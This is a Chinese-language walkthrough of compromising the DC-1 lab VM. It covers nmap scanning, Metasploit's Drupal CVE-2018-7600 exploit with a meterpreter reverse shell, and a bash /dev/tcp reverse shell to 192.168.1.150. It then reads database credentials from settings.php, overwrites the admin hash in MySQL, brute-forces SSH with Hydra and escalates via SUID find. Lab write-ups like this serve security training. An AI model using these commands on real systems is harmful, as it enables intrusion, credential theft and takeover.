九種DC靶機滲透測試

DC-1靶機測試

1.DC-1靶機安裝

安裝進去后，修改網絡設置為nat模式

2.靶機入侵

對當前網絡進行內網主機嗅探

Namp –A 192.168.114.128/24

nmap -sP 192.168.114.128/24 -oN nmap Sp

通過對照ip地址段，或者mac地址對比

靶機ip為192.168.114.133

對其進行端口掃描

Nmap –A 目標ip地址

發現目標主機開啟了22，80，111端口

80端口的網段可以清晰的看出網站的模板：drupal 7

通過對80端口的了解

22端口通過爆破

80端口，網站服務：

通過查找CMS，因為其80端口處于開放狀態

直接通過ip地址訪問其網頁

發現一個登錄界面：

常規思路，直接上CMS查找cms漏洞

使用msfconsole

啟動它

Search dripal可以看到

通過觀察，使用   use 漏洞屬性

了解該漏洞的詳細信息

CVE-2018-7600

選擇攻擊載荷

setpayload php/meterpreter/reverse_tcp

show options

補充目的地址和源ip

Set RHOSTS 192.168.114.133

使用漏洞攻擊

Exploit

使用ls查看命令，發現有一個flag1.txt文件

Pwd

Cat flag1.txt

Flag1

Every good CMS needs a config file - and so do you.

這句話是說我們應該去找一找網頁配置文件

So

網頁配置文件在sites/default/

Cat sites/default/settings.php

FALG2

成功獲取到

得到數據的配置信息

'database' => 'drupaldb',

'username' => 'dbuser',

'password' => 'R0ck3t',

'host' => 'localhost',

Shell進入交互界面

紫色為查詢命令

meterpreter > shell

Process 3802 created.

Channel 2 created.

id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

whoami

www-data

pwd

/var/www

uname -a

Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux

發現所有的數據都被爆出來

現在嘗試與數據庫進行鏈接

不用思考直接連接根本不可能

但是我們可以利用反彈shell

本地監聽端口為2333端口

nc –lvvp 2333

但是反彈失敗

此時我們只能借用python來進行反彈

Python –c “import pty;pty.spawn(“/bin/bash”)’

www-data@DC-1:/var/www/sites/default$bash -i >& /dev/tcp/192.168.1.150/2333 0>&1

但是還是發現無法成功連接到數據庫

在不斷嘗試過后

發現python交互界面可以連接到數據庫

python –c ‘import pty;pty.spawn(“/bin/bash”)’

終于成功進入數據庫

成功入庫

進入數據庫后

Show databases;

mysql>usedrupaldb;          #使用drupaldb數據庫

mysql>show tables;           #查看數據庫內的表

Select * from users;(數據結構爆出)

我們發現其中admin數據特別顯眼

在exploitdb中有一個針對Drupal7版本的攻擊腳本，可以增加一個admin權限的用戶賬號，使用此方法簡便了破解admin的密碼，更直接。

我們直接通過模擬干一個admin2進去

python /usr/share/exploitdb/exploits/php/webapps/34992.py –t http://192.168.114.133 –u admin2 –p admin2

打開數據查詢

發現并沒有寫入成功，不清楚原因

于是換方法通過改admin密碼

$php scripts/password-hash.sh jwt  #生成新密碼jwt

# hash: $S$D7X87Lt70/gFwyF4o87BTVa1uSa2BJ7qKAfmD6Y6aAbjfJzHkLHE

mysql> update drupaldb.users set pass=" $S$D7X87Lt70/gFwyF4o87BTVa1uSa2BJ7qKAfmD6Y6aAbjfJzHkLHE " where name="admin";

成功修改；

Flag3來了

flag3的信息中提到了passwd和shadow,

所以進行提權

Tail -3 /etc/passwd

發現flag4

使用shadow失敗

我們知道一個工具

Hydra

使用它進行爆破

sudohydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz 192.168.114.133 ssh

或者

sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.114.133

-l  指定破解的用戶

-P  指定密碼字典

ssh://ip 指定使用協議和ip地址

密碼成功爆出

用ssh遠程連接

但是cat發現在root目錄下面發現thefinalflag.txt,沒有權限讀取

想辦法進行提權，這里可以采用冰蝎shell上傳進行提權

也可以利用root文件/bin/bash進行提權操作

第一種提權失敗

第二種提權方法

flag4@DC-1:~$ find / -user root -perm -4000 -print 2>/dev/null

查看特權文件成功

在root屬性下

進行提權

flag4@DC-1:~$ find / -name flag4.txt -exec "/bin/sh" \;

提權成功

靶機通關。